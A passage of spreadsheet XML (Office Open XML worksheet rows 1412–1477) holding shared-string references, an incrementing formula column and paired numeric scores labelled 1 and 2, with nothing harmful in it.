        <v>15.072525024414061</v>
      </c>
      <c r="F1412">
        <v>1</v>
      </c>
    </row>
    <row r="1413" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1413" t="s">
        <v>2715</v>
      </c>
      <c r="B1413" t="s">
        <v>2716</v>
      </c>
      <c r="C1413">
        <f t="shared" si="21"/>
        <v>11199424</v>
      </c>
      <c r="D1413" t="s">
        <v>2718</v>
      </c>
      <c r="E1413">
        <v>14.384074211120611</v>
      </c>
      <c r="F1413">
        <v>2</v>
      </c>
    </row>
    <row r="1414" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1414" t="s">
        <v>2719</v>
      </c>
      <c r="B1414" t="s">
        <v>2720</v>
      </c>
      <c r="C1414">
        <f t="shared" si="21"/>
        <v>11200677</v>
      </c>
      <c r="D1414" t="s">
        <v>2721</v>
      </c>
      <c r="E1414">
        <v>26.161420822143551</v>
      </c>
      <c r="F1414">
        <v>1</v>
      </c>
    </row>
    <row r="1415" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1415" t="s">
        <v>2719</v>
      </c>
      <c r="B1415" t="s">
        <v>2720</v>
      </c>
      <c r="C1415">
        <f t="shared" si="21"/>
        <v>11201930</v>
      </c>
      <c r="D1415" t="s">
        <v>2722</v>
      </c>
      <c r="E1415">
        <v>2.015167236328125</v>
      </c>
      <c r="F1415">
        <v>2</v>
      </c>
    </row>
    <row r="1416" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1416" t="s">
        <v>2723</v>
      </c>
      <c r="B1416" t="s">
        <v>2724</v>
      </c>
      <c r="C1416">
        <f t="shared" si="21"/>
        <v>11203183</v>
      </c>
      <c r="D1416" t="s">
        <v>2725</v>
      </c>
      <c r="E1416">
        <v>30.781862258911129</v>
      </c>
      <c r="F1416">
        <v>1</v>
      </c>
    </row>
    <row r="1417" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1417" t="s">
        <v>2723</v>
      </c>
      <c r="B1417" t="s">
        <v>2724</v>
      </c>
      <c r="C1417">
        <f t="shared" si="21"/>
        <v>11204436</v>
      </c>
      <c r="D1417" t="s">
        <v>2726</v>
      </c>
      <c r="E1417">
        <v>1.8247839761897919E-4</v>
      </c>
      <c r="F1417">
        <v>2</v>
      </c>
    </row>
    <row r="1418" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1418" t="s">
        <v>2727</v>
      </c>
      <c r="B1418" t="s">
        <v>2728</v>
      </c>
      <c r="C1418">
        <f t="shared" ref="C1418:C1481" si="22">C1417+1253</f>
        <v>11205689</v>
      </c>
      <c r="D1418" t="s">
        <v>2729</v>
      </c>
      <c r="E1418">
        <v>31.50960540771484</v>
      </c>
      <c r="F1418">
        <v>1</v>
      </c>
    </row>
    <row r="1419" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1419" t="s">
        <v>2727</v>
      </c>
      <c r="B1419" t="s">
        <v>2728</v>
      </c>
      <c r="C1419">
        <f t="shared" si="22"/>
        <v>11206942</v>
      </c>
      <c r="D1419" t="s">
        <v>2730</v>
      </c>
      <c r="E1419">
        <v>2.250827312469482</v>
      </c>
      <c r="F1419">
        <v>2</v>
      </c>
    </row>
    <row r="1420" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1420" t="s">
        <v>2731</v>
      </c>
      <c r="B1420" t="s">
        <v>2732</v>
      </c>
      <c r="C1420">
        <f t="shared" si="22"/>
        <v>11208195</v>
      </c>
      <c r="D1420" t="s">
        <v>2733</v>
      </c>
      <c r="E1420">
        <v>28.413583755493161</v>
      </c>
      <c r="F1420">
        <v>1</v>
      </c>
    </row>
    <row r="1421" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1421" t="s">
        <v>2731</v>
      </c>
      <c r="B1421" t="s">
        <v>2732</v>
      </c>
      <c r="C1421">
        <f t="shared" si="22"/>
        <v>11209448</v>
      </c>
      <c r="D1421" t="s">
        <v>2734</v>
      </c>
      <c r="E1421">
        <v>10.583470344543461</v>
      </c>
      <c r="F1421">
        <v>2</v>
      </c>
    </row>
    <row r="1422" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1422" t="s">
        <v>2735</v>
      </c>
      <c r="B1422" t="s">
        <v>2736</v>
      </c>
      <c r="C1422">
        <f t="shared" si="22"/>
        <v>11210701</v>
      </c>
      <c r="D1422" t="s">
        <v>2737</v>
      </c>
      <c r="E1422">
        <v>21.272907257080082</v>
      </c>
      <c r="F1422">
        <v>1</v>
      </c>
    </row>
    <row r="1423" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1423" t="s">
        <v>2735</v>
      </c>
      <c r="B1423" t="s">
        <v>2736</v>
      </c>
      <c r="C1423">
        <f t="shared" si="22"/>
        <v>11211954</v>
      </c>
      <c r="D1423" t="s">
        <v>2738</v>
      </c>
      <c r="E1423">
        <v>17.237846374511719</v>
      </c>
      <c r="F1423">
        <v>2</v>
      </c>
    </row>
    <row r="1424" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1424" t="s">
        <v>2739</v>
      </c>
      <c r="B1424" t="s">
        <v>2740</v>
      </c>
      <c r="C1424">
        <f t="shared" si="22"/>
        <v>11213207</v>
      </c>
      <c r="D1424" t="s">
        <v>2741</v>
      </c>
      <c r="E1424">
        <v>28.491500854492191</v>
      </c>
      <c r="F1424">
        <v>1</v>
      </c>
    </row>
    <row r="1425" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1425" t="s">
        <v>2739</v>
      </c>
      <c r="B1425" t="s">
        <v>2740</v>
      </c>
      <c r="C1425">
        <f t="shared" si="22"/>
        <v>11214460</v>
      </c>
      <c r="D1425" t="s">
        <v>2742</v>
      </c>
      <c r="E1425">
        <v>4.0872821807861328</v>
      </c>
      <c r="F1425">
        <v>2</v>
      </c>
    </row>
    <row r="1426" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1426" t="s">
        <v>2743</v>
      </c>
      <c r="B1426" t="s">
        <v>2744</v>
      </c>
      <c r="C1426">
        <f t="shared" si="22"/>
        <v>11215713</v>
      </c>
      <c r="D1426" t="s">
        <v>2745</v>
      </c>
      <c r="E1426">
        <v>30.30558967590332</v>
      </c>
      <c r="F1426">
        <v>1</v>
      </c>
    </row>
    <row r="1427" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1427" t="s">
        <v>2743</v>
      </c>
      <c r="B1427" t="s">
        <v>2744</v>
      </c>
      <c r="C1427">
        <f t="shared" si="22"/>
        <v>11216966</v>
      </c>
      <c r="D1427" t="s">
        <v>2746</v>
      </c>
      <c r="E1427">
        <v>12.42717933654785</v>
      </c>
      <c r="F1427">
        <v>2</v>
      </c>
    </row>
    <row r="1428" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1428" t="s">
        <v>2747</v>
      </c>
      <c r="B1428" t="s">
        <v>2748</v>
      </c>
      <c r="C1428">
        <f t="shared" si="22"/>
        <v>11218219</v>
      </c>
      <c r="D1428" t="s">
        <v>2749</v>
      </c>
      <c r="E1428">
        <v>25.206108093261719</v>
      </c>
      <c r="F1428">
        <v>1</v>
      </c>
    </row>
    <row r="1429" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1429" t="s">
        <v>2747</v>
      </c>
      <c r="B1429" t="s">
        <v>2748</v>
      </c>
      <c r="C1429">
        <f t="shared" si="22"/>
        <v>11219472</v>
      </c>
      <c r="D1429" t="s">
        <v>2750</v>
      </c>
      <c r="E1429">
        <v>5.4824581146240234</v>
      </c>
      <c r="F1429">
        <v>2</v>
      </c>
    </row>
    <row r="1430" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1430" t="s">
        <v>2751</v>
      </c>
      <c r="B1430" t="s">
        <v>2752</v>
      </c>
      <c r="C1430">
        <f t="shared" si="22"/>
        <v>11220725</v>
      </c>
      <c r="D1430" t="s">
        <v>2753</v>
      </c>
      <c r="E1430">
        <v>30.596445083618161</v>
      </c>
      <c r="F1430">
        <v>1</v>
      </c>
    </row>
    <row r="1431" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1431" t="s">
        <v>2751</v>
      </c>
      <c r="B1431" t="s">
        <v>2752</v>
      </c>
      <c r="C1431">
        <f t="shared" si="22"/>
        <v>11221978</v>
      </c>
      <c r="D1431" t="s">
        <v>2754</v>
      </c>
      <c r="E1431">
        <v>6.7326321601867676</v>
      </c>
      <c r="F1431">
        <v>2</v>
      </c>
    </row>
    <row r="1432" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1432" t="s">
        <v>2755</v>
      </c>
      <c r="B1432" t="s">
        <v>2756</v>
      </c>
      <c r="C1432">
        <f t="shared" si="22"/>
        <v>11223231</v>
      </c>
      <c r="D1432" t="s">
        <v>1206</v>
      </c>
      <c r="E1432">
        <v>35.779582977294922</v>
      </c>
      <c r="F1432">
        <v>1</v>
      </c>
    </row>
    <row r="1433" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1433" t="s">
        <v>2755</v>
      </c>
      <c r="B1433" t="s">
        <v>2756</v>
      </c>
      <c r="C1433">
        <f t="shared" si="22"/>
        <v>11224484</v>
      </c>
      <c r="D1433" t="s">
        <v>2757</v>
      </c>
      <c r="E1433">
        <v>8.4531145095825195</v>
      </c>
      <c r="F1433">
        <v>2</v>
      </c>
    </row>
    <row r="1434" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1434" t="s">
        <v>2758</v>
      </c>
      <c r="B1434" t="s">
        <v>2759</v>
      </c>
      <c r="C1434">
        <f t="shared" si="22"/>
        <v>11225737</v>
      </c>
      <c r="D1434" t="s">
        <v>2760</v>
      </c>
      <c r="E1434">
        <v>20.183965682983398</v>
      </c>
      <c r="F1434">
        <v>1</v>
      </c>
    </row>
    <row r="1435" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1435" t="s">
        <v>2758</v>
      </c>
      <c r="B1435" t="s">
        <v>2759</v>
      </c>
      <c r="C1435">
        <f t="shared" si="22"/>
        <v>11226990</v>
      </c>
      <c r="D1435" t="s">
        <v>2761</v>
      </c>
      <c r="E1435">
        <v>14.897443771362299</v>
      </c>
      <c r="F1435">
        <v>2</v>
      </c>
    </row>
    <row r="1436" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1436" t="s">
        <v>2762</v>
      </c>
      <c r="B1436" t="s">
        <v>2763</v>
      </c>
      <c r="C1436">
        <f t="shared" si="22"/>
        <v>11228243</v>
      </c>
      <c r="D1436" t="s">
        <v>2764</v>
      </c>
      <c r="E1436">
        <v>31.413532257080082</v>
      </c>
      <c r="F1436">
        <v>1</v>
      </c>
    </row>
    <row r="1437" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1437" t="s">
        <v>2762</v>
      </c>
      <c r="B1437" t="s">
        <v>2763</v>
      </c>
      <c r="C1437">
        <f t="shared" si="22"/>
        <v>11229496</v>
      </c>
      <c r="D1437" t="s">
        <v>2765</v>
      </c>
      <c r="E1437">
        <v>4.7438206672668457</v>
      </c>
      <c r="F1437">
        <v>2</v>
      </c>
    </row>
    <row r="1438" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1438" t="s">
        <v>2766</v>
      </c>
      <c r="B1438" t="s">
        <v>2767</v>
      </c>
      <c r="C1438">
        <f t="shared" si="22"/>
        <v>11230749</v>
      </c>
      <c r="D1438" t="s">
        <v>2768</v>
      </c>
      <c r="E1438">
        <v>31.907022476196289</v>
      </c>
      <c r="F1438">
        <v>1</v>
      </c>
    </row>
    <row r="1439" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1439" t="s">
        <v>2766</v>
      </c>
      <c r="B1439" t="s">
        <v>2767</v>
      </c>
      <c r="C1439">
        <f t="shared" si="22"/>
        <v>11232002</v>
      </c>
      <c r="D1439" t="s">
        <v>2769</v>
      </c>
      <c r="E1439">
        <v>11.79667854309082</v>
      </c>
      <c r="F1439">
        <v>2</v>
      </c>
    </row>
    <row r="1440" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1440" t="s">
        <v>2770</v>
      </c>
      <c r="B1440" t="s">
        <v>2771</v>
      </c>
      <c r="C1440">
        <f t="shared" si="22"/>
        <v>11233255</v>
      </c>
      <c r="D1440" t="s">
        <v>2772</v>
      </c>
      <c r="E1440">
        <v>22.07200813293457</v>
      </c>
      <c r="F1440">
        <v>1</v>
      </c>
    </row>
    <row r="1441" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1441" t="s">
        <v>2770</v>
      </c>
      <c r="B1441" t="s">
        <v>2771</v>
      </c>
      <c r="C1441">
        <f t="shared" si="22"/>
        <v>11234508</v>
      </c>
      <c r="D1441" t="s">
        <v>2773</v>
      </c>
      <c r="E1441">
        <v>15.560006141662599</v>
      </c>
      <c r="F1441">
        <v>2</v>
      </c>
    </row>
    <row r="1442" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1442" t="s">
        <v>2774</v>
      </c>
      <c r="B1442" t="s">
        <v>2775</v>
      </c>
      <c r="C1442">
        <f t="shared" si="22"/>
        <v>11235761</v>
      </c>
      <c r="D1442" t="s">
        <v>2776</v>
      </c>
      <c r="E1442">
        <v>30.622314453125</v>
      </c>
      <c r="F1442">
        <v>1</v>
      </c>
    </row>
    <row r="1443" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1443" t="s">
        <v>2774</v>
      </c>
      <c r="B1443" t="s">
        <v>2775</v>
      </c>
      <c r="C1443">
        <f t="shared" si="22"/>
        <v>11237014</v>
      </c>
      <c r="D1443" t="s">
        <v>2777</v>
      </c>
      <c r="E1443">
        <v>0.20067797601222989</v>
      </c>
      <c r="F1443">
        <v>2</v>
      </c>
    </row>
    <row r="1444" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1444" t="s">
        <v>2778</v>
      </c>
      <c r="B1444" t="s">
        <v>2779</v>
      </c>
      <c r="C1444">
        <f t="shared" si="22"/>
        <v>11238267</v>
      </c>
      <c r="D1444" t="s">
        <v>2780</v>
      </c>
      <c r="E1444">
        <v>32.513862609863281</v>
      </c>
      <c r="F1444">
        <v>1</v>
      </c>
    </row>
    <row r="1445" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1445" t="s">
        <v>2778</v>
      </c>
      <c r="B1445" t="s">
        <v>2779</v>
      </c>
      <c r="C1445">
        <f t="shared" si="22"/>
        <v>11239520</v>
      </c>
      <c r="D1445" t="s">
        <v>2781</v>
      </c>
      <c r="E1445">
        <v>0.27678349614143372</v>
      </c>
      <c r="F1445">
        <v>2</v>
      </c>
    </row>
    <row r="1446" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1446" t="s">
        <v>2782</v>
      </c>
      <c r="B1446" t="s">
        <v>2783</v>
      </c>
      <c r="C1446">
        <f t="shared" si="22"/>
        <v>11240773</v>
      </c>
      <c r="D1446" t="s">
        <v>2784</v>
      </c>
      <c r="E1446">
        <v>32.532722473144531</v>
      </c>
      <c r="F1446">
        <v>1</v>
      </c>
    </row>
    <row r="1447" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1447" t="s">
        <v>2782</v>
      </c>
      <c r="B1447" t="s">
        <v>2783</v>
      </c>
      <c r="C1447">
        <f t="shared" si="22"/>
        <v>11242026</v>
      </c>
      <c r="D1447" t="s">
        <v>2785</v>
      </c>
      <c r="E1447">
        <v>6.5266575813293457</v>
      </c>
      <c r="F1447">
        <v>2</v>
      </c>
    </row>
    <row r="1448" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1448" t="s">
        <v>2786</v>
      </c>
      <c r="B1448" t="s">
        <v>2787</v>
      </c>
      <c r="C1448">
        <f t="shared" si="22"/>
        <v>11243279</v>
      </c>
      <c r="D1448" t="s">
        <v>2788</v>
      </c>
      <c r="E1448">
        <v>22.253095626831051</v>
      </c>
      <c r="F1448">
        <v>1</v>
      </c>
    </row>
    <row r="1449" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1449" t="s">
        <v>2786</v>
      </c>
      <c r="B1449" t="s">
        <v>2787</v>
      </c>
      <c r="C1449">
        <f t="shared" si="22"/>
        <v>11244532</v>
      </c>
      <c r="D1449" t="s">
        <v>2789</v>
      </c>
      <c r="E1449">
        <v>8.3905057907104492</v>
      </c>
      <c r="F1449">
        <v>2</v>
      </c>
    </row>
    <row r="1450" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1450" t="s">
        <v>2790</v>
      </c>
      <c r="B1450" t="s">
        <v>2791</v>
      </c>
      <c r="C1450">
        <f t="shared" si="22"/>
        <v>11245785</v>
      </c>
      <c r="D1450" t="s">
        <v>2792</v>
      </c>
      <c r="E1450">
        <v>38.425457000732422</v>
      </c>
      <c r="F1450">
        <v>1</v>
      </c>
    </row>
    <row r="1451" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1451" t="s">
        <v>2790</v>
      </c>
      <c r="B1451" t="s">
        <v>2791</v>
      </c>
      <c r="C1451">
        <f t="shared" si="22"/>
        <v>11247038</v>
      </c>
      <c r="D1451" t="s">
        <v>2793</v>
      </c>
      <c r="E1451">
        <v>5.5381007194519043</v>
      </c>
      <c r="F1451">
        <v>2</v>
      </c>
    </row>
    <row r="1452" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1452" t="s">
        <v>2794</v>
      </c>
      <c r="B1452" t="s">
        <v>2795</v>
      </c>
      <c r="C1452">
        <f t="shared" si="22"/>
        <v>11248291</v>
      </c>
      <c r="D1452" t="s">
        <v>2796</v>
      </c>
      <c r="E1452">
        <v>30.034702301025391</v>
      </c>
      <c r="F1452">
        <v>1</v>
      </c>
    </row>
    <row r="1453" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1453" t="s">
        <v>2794</v>
      </c>
      <c r="B1453" t="s">
        <v>2795</v>
      </c>
      <c r="C1453">
        <f t="shared" si="22"/>
        <v>11249544</v>
      </c>
      <c r="D1453" t="s">
        <v>2797</v>
      </c>
      <c r="E1453">
        <v>15.112381935119631</v>
      </c>
      <c r="F1453">
        <v>2</v>
      </c>
    </row>
    <row r="1454" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1454" t="s">
        <v>2798</v>
      </c>
      <c r="B1454" t="s">
        <v>2799</v>
      </c>
      <c r="C1454">
        <f t="shared" si="22"/>
        <v>11250797</v>
      </c>
      <c r="D1454" t="s">
        <v>2800</v>
      </c>
      <c r="E1454">
        <v>29.476505279541019</v>
      </c>
      <c r="F1454">
        <v>1</v>
      </c>
    </row>
    <row r="1455" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1455" t="s">
        <v>2798</v>
      </c>
      <c r="B1455" t="s">
        <v>2799</v>
      </c>
      <c r="C1455">
        <f t="shared" si="22"/>
        <v>11252050</v>
      </c>
      <c r="D1455" t="s">
        <v>2801</v>
      </c>
      <c r="E1455">
        <v>10.49358654022217</v>
      </c>
      <c r="F1455">
        <v>2</v>
      </c>
    </row>
    <row r="1456" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1456" t="s">
        <v>2802</v>
      </c>
      <c r="B1456" t="s">
        <v>2803</v>
      </c>
      <c r="C1456">
        <f t="shared" si="22"/>
        <v>11253303</v>
      </c>
      <c r="D1456" t="s">
        <v>2804</v>
      </c>
      <c r="E1456">
        <v>21.328701019287109</v>
      </c>
      <c r="F1456">
        <v>1</v>
      </c>
    </row>
    <row r="1457" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1457" t="s">
        <v>2802</v>
      </c>
      <c r="B1457" t="s">
        <v>2803</v>
      </c>
      <c r="C1457">
        <f t="shared" si="22"/>
        <v>11254556</v>
      </c>
      <c r="D1457" t="s">
        <v>2805</v>
      </c>
      <c r="E1457">
        <v>1.969143152236938</v>
      </c>
      <c r="F1457">
        <v>2</v>
      </c>
    </row>
    <row r="1458" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1458" t="s">
        <v>2806</v>
      </c>
      <c r="B1458" t="s">
        <v>2807</v>
      </c>
      <c r="C1458">
        <f t="shared" si="22"/>
        <v>11255809</v>
      </c>
      <c r="D1458" t="s">
        <v>2808</v>
      </c>
      <c r="E1458">
        <v>16.730413436889648</v>
      </c>
      <c r="F1458">
        <v>1</v>
      </c>
    </row>
    <row r="1459" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1459" t="s">
        <v>2806</v>
      </c>
      <c r="B1459" t="s">
        <v>2807</v>
      </c>
      <c r="C1459">
        <f t="shared" si="22"/>
        <v>11257062</v>
      </c>
      <c r="D1459" t="s">
        <v>2809</v>
      </c>
      <c r="E1459">
        <v>15.119307518005369</v>
      </c>
      <c r="F1459">
        <v>2</v>
      </c>
    </row>
    <row r="1460" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1460" t="s">
        <v>2810</v>
      </c>
      <c r="B1460" t="s">
        <v>2811</v>
      </c>
      <c r="C1460">
        <f t="shared" si="22"/>
        <v>11258315</v>
      </c>
      <c r="D1460" t="s">
        <v>2812</v>
      </c>
      <c r="E1460">
        <v>22.015655517578121</v>
      </c>
      <c r="F1460">
        <v>1</v>
      </c>
    </row>
    <row r="1461" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1461" t="s">
        <v>2810</v>
      </c>
      <c r="B1461" t="s">
        <v>2811</v>
      </c>
      <c r="C1461">
        <f t="shared" si="22"/>
        <v>11259568</v>
      </c>
      <c r="D1461" t="s">
        <v>2813</v>
      </c>
      <c r="E1461">
        <v>0.52412170171737671</v>
      </c>
      <c r="F1461">
        <v>2</v>
      </c>
    </row>
    <row r="1462" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1462" t="s">
        <v>2814</v>
      </c>
      <c r="B1462" t="s">
        <v>2815</v>
      </c>
      <c r="C1462">
        <f t="shared" si="22"/>
        <v>11260821</v>
      </c>
      <c r="D1462" t="s">
        <v>2816</v>
      </c>
      <c r="E1462">
        <v>23.110689163208011</v>
      </c>
      <c r="F1462">
        <v>1</v>
      </c>
    </row>
    <row r="1463" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1463" t="s">
        <v>2814</v>
      </c>
      <c r="B1463" t="s">
        <v>2815</v>
      </c>
      <c r="C1463">
        <f t="shared" si="22"/>
        <v>11262074</v>
      </c>
      <c r="D1463" t="s">
        <v>2817</v>
      </c>
      <c r="E1463">
        <v>12.61089515686035</v>
      </c>
      <c r="F1463">
        <v>2</v>
      </c>
    </row>
    <row r="1464" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1464" t="s">
        <v>2818</v>
      </c>
      <c r="B1464" t="s">
        <v>2819</v>
      </c>
      <c r="C1464">
        <f t="shared" si="22"/>
        <v>11263327</v>
      </c>
      <c r="D1464" t="s">
        <v>2816</v>
      </c>
      <c r="E1464">
        <v>22.01915168762207</v>
      </c>
      <c r="F1464">
        <v>1</v>
      </c>
    </row>
    <row r="1465" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1465" t="s">
        <v>2818</v>
      </c>
      <c r="B1465" t="s">
        <v>2819</v>
      </c>
      <c r="C1465">
        <f t="shared" si="22"/>
        <v>11264580</v>
      </c>
      <c r="D1465" t="s">
        <v>2820</v>
      </c>
      <c r="E1465">
        <v>1.4292382001876831</v>
      </c>
      <c r="F1465">
        <v>2</v>
      </c>
    </row>
    <row r="1466" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1466" t="s">
        <v>2821</v>
      </c>
      <c r="B1466" t="s">
        <v>2822</v>
      </c>
      <c r="C1466">
        <f t="shared" si="22"/>
        <v>11265833</v>
      </c>
      <c r="D1466" t="s">
        <v>2823</v>
      </c>
      <c r="E1466">
        <v>24.256984710693359</v>
      </c>
      <c r="F1466">
        <v>1</v>
      </c>
    </row>
    <row r="1467" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1467" t="s">
        <v>2821</v>
      </c>
      <c r="B1467" t="s">
        <v>2822</v>
      </c>
      <c r="C1467">
        <f t="shared" si="22"/>
        <v>11267086</v>
      </c>
      <c r="D1467" t="s">
        <v>2824</v>
      </c>
      <c r="E1467">
        <v>14.661445617675779</v>
      </c>
      <c r="F1467">
        <v>2</v>
      </c>
    </row>
    <row r="1468" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1468" t="s">
        <v>2825</v>
      </c>
      <c r="B1468" t="s">
        <v>2826</v>
      </c>
      <c r="C1468">
        <f t="shared" si="22"/>
        <v>11268339</v>
      </c>
      <c r="D1468" t="s">
        <v>2827</v>
      </c>
      <c r="E1468">
        <v>26.310419082641602</v>
      </c>
      <c r="F1468">
        <v>1</v>
      </c>
    </row>
    <row r="1469" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1469" t="s">
        <v>2825</v>
      </c>
      <c r="B1469" t="s">
        <v>2826</v>
      </c>
      <c r="C1469">
        <f t="shared" si="22"/>
        <v>11269592</v>
      </c>
      <c r="D1469" t="s">
        <v>2828</v>
      </c>
      <c r="E1469">
        <v>1.5303699970245359</v>
      </c>
      <c r="F1469">
        <v>2</v>
      </c>
    </row>
    <row r="1470" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1470" t="s">
        <v>2829</v>
      </c>
      <c r="B1470" t="s">
        <v>2830</v>
      </c>
      <c r="C1470">
        <f t="shared" si="22"/>
        <v>11270845</v>
      </c>
      <c r="D1470" t="s">
        <v>2831</v>
      </c>
      <c r="E1470">
        <v>30.65361404418945</v>
      </c>
      <c r="F1470">
        <v>1</v>
      </c>
    </row>
    <row r="1471" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1471" t="s">
        <v>2829</v>
      </c>
      <c r="B1471" t="s">
        <v>2830</v>
      </c>
      <c r="C1471">
        <f t="shared" si="22"/>
        <v>11272098</v>
      </c>
      <c r="D1471" t="s">
        <v>2832</v>
      </c>
      <c r="E1471">
        <v>8.0022182464599609</v>
      </c>
      <c r="F1471">
        <v>2</v>
      </c>
    </row>
    <row r="1472" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1472" t="s">
        <v>2833</v>
      </c>
      <c r="B1472" t="s">
        <v>2387</v>
      </c>
      <c r="C1472">
        <f t="shared" si="22"/>
        <v>11273351</v>
      </c>
      <c r="D1472" t="s">
        <v>2388</v>
      </c>
      <c r="E1472">
        <v>27.04002571105957</v>
      </c>
      <c r="F1472">
        <v>1</v>
      </c>
    </row>
    <row r="1473" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1473" t="s">
        <v>2833</v>
      </c>
      <c r="B1473" t="s">
        <v>2387</v>
      </c>
      <c r="C1473">
        <f t="shared" si="22"/>
        <v>11274604</v>
      </c>
      <c r="D1473" t="s">
        <v>2834</v>
      </c>
      <c r="E1473">
        <v>7.3896112442016602</v>
      </c>
      <c r="F1473">
        <v>2</v>
      </c>
    </row>
    <row r="1474" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1474" t="s">
        <v>2835</v>
      </c>
      <c r="B1474" t="s">
        <v>2836</v>
      </c>
      <c r="C1474">
        <f t="shared" si="22"/>
        <v>11275857</v>
      </c>
      <c r="D1474" t="s">
        <v>2837</v>
      </c>
      <c r="E1474">
        <v>29.767429351806641</v>
      </c>
      <c r="F1474">
        <v>1</v>
      </c>
    </row>
    <row r="1475" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1475" t="s">
        <v>2835</v>
      </c>
      <c r="B1475" t="s">
        <v>2836</v>
      </c>
      <c r="C1475">
        <f t="shared" si="22"/>
        <v>11277110</v>
      </c>
      <c r="D1475" t="s">
        <v>2838</v>
      </c>
      <c r="E1475">
        <v>11.865024566650391</v>
      </c>
      <c r="F1475">
        <v>2</v>
      </c>
    </row>
    <row r="1476" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1476" t="s">
        <v>2839</v>
      </c>
      <c r="B1476" t="s">
        <v>2840</v>
      </c>
      <c r="C1476">
        <f t="shared" si="22"/>
        <v>11278363</v>
      </c>
      <c r="D1476" t="s">
        <v>2841</v>
      </c>
      <c r="E1476">
        <v>29.71365928649902</v>
      </c>
      <c r="F1476">
        <v>1</v>
      </c>
    </row>
    <row r="1477" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1477" t="s">
        <v>2839</v>
      </c>
      <c r="B1477" t="s">
        <v>2840</v>
      </c>
      <c r="C1477">
        <f t="shared" si="22"/>
        <v>11279616</v>
      </c>
      <c r="D1477" t="s">
        <v>2842</v>
      </c>
      <c r="E1477">
